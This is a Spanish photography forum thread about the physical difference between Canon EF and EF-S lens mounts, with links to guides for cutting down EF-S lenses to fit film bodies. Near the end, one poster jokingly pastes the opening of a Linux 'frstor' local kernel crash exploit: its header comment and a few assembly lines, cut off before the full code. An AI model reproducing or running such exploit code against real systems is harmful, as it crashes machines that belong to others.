La diferencia consiste en que los EF-S solo pueden ser montados en cámaras digitales porque incorporan un pequeño truco para que no sean compatibles.
Os adjunto una foto para que se entienda mejor.
A la izquierda está el EF y a la derecha el EF-S.
Si alguien se atreve a serrar el plástico que le 'sobra' al EF-S su objetivo se comportará como un EF. Canon ideó EF-S según las malas lenguas (solo es un rumor, insisto) para vender objetivos que no pueden ser usados en cámaras EOS no digitales. Imaginaros que podeis vender barato el 18-55 del kit a alguien. Podríais ganar dinero en la operación (en el kit está valorado en 50€ aproximadamente de PVP) y todos contentos. Si intentais montar un EF-S en una cámara no digital, no os cabrá por el exceso de plástico ;-)
Por si alguien se atreve visitar esta página http://www.bobatkins.com/photography...s/efs-10d.html donde explican como hacerlo, creo que tenía otra donde estaba mejor pero ahora no la encuentro, bueno si la encuentro la pondré.
Atención: este tema no es para practicarlo a la ligera. Yo no animo a nadie a hacerlo, es delicadísimo y los resultados no están garantizados. Una cosa es explicar diferencias y cómo solventarlas y otra, muy distinta, ponerlo en práctica. Quizás en mi mensaje anterior animaba, sin pretenderlo, a hacerlo pero os aseguro que no era mi intención.
¡Hombre avisado vale por dos!
Muchas gracias por despejarme la duda asistencial que tenía desde hace tiempo ... voy a echar un vistazo al vínculo aunque no creo que me meta con ello.
Por cierto, viviendo en este mundo de tecnología, ¿No ha hecho nadie un adaptador? ... lo venderian como rosquillas ... ¿No?
Canon EOS 7D + Grip + 40D + 350D + BG-E3 + EF-S 17-85 f4-5,6 IS USM + EF 28-135 f3,5-5,6 IS USM + EF 50 f1.8 II + Lowepro Nova 4 AW + Mini Trekker AW
Bueno ya he encontrado la dichosa página www.wrotniak.net/photo/infrared/#NEED son fotografias paso a paso de la modificación y fotos hechas con una 10D y el 18-55 EFS
Hasta pronto.
Ops, disculpad aqui lo teneis http://members.cox.net/byteseller/EFS-WEB/EFS-WEB.html eso me pasa por tener veinte pestañas abiertas en el navegador, como con Linux no se cuelga je, je...![]()
Hombre tampoco parece tan complicado aunque creo que solo interesa a quienes tienen cuerpos analógicos, ya que un angular semejante para analógicas pues ya sabemos lo que nos clavan.
Hasta pronto.
Miradlo por el lado contrario... lo único que se arriesga es el valor del 18-55, que tampoco es demasiado...
Lo digo esto porque yo no lo tengo y no me puedo plantear el hacerlo![]()
350D - Canon 50 F1.8 II - Canon 17-40L F4 - Canon 70-200L F4
carlitos12+vigape: bueno como veo que esto está derivando en una conversación de informáticos os propongo un sistema para colgar Linux (aunque no sé de qué Linux se está hablando):
/* --------------------
* frstor Local Kernel exploit
* Crashes any kernel from 2.4.18
* to 2.6.7 because frstor in assembler
* inline offsets in memory by 4.
* Original proof of concept code
* by stian_@_nixia.no.
* Added some stuff by lorenzo_@_gnu.org
* and fixed the fsave line with (*fpubuf).
* --------------------
*/
/*
---------
Some debugging information made
available by stian_@_nixia.no
---------
TakeDown:
pushl %ebp
movl %esp, %ebp
subl $136, %esp
leal -120(%ebp), %eax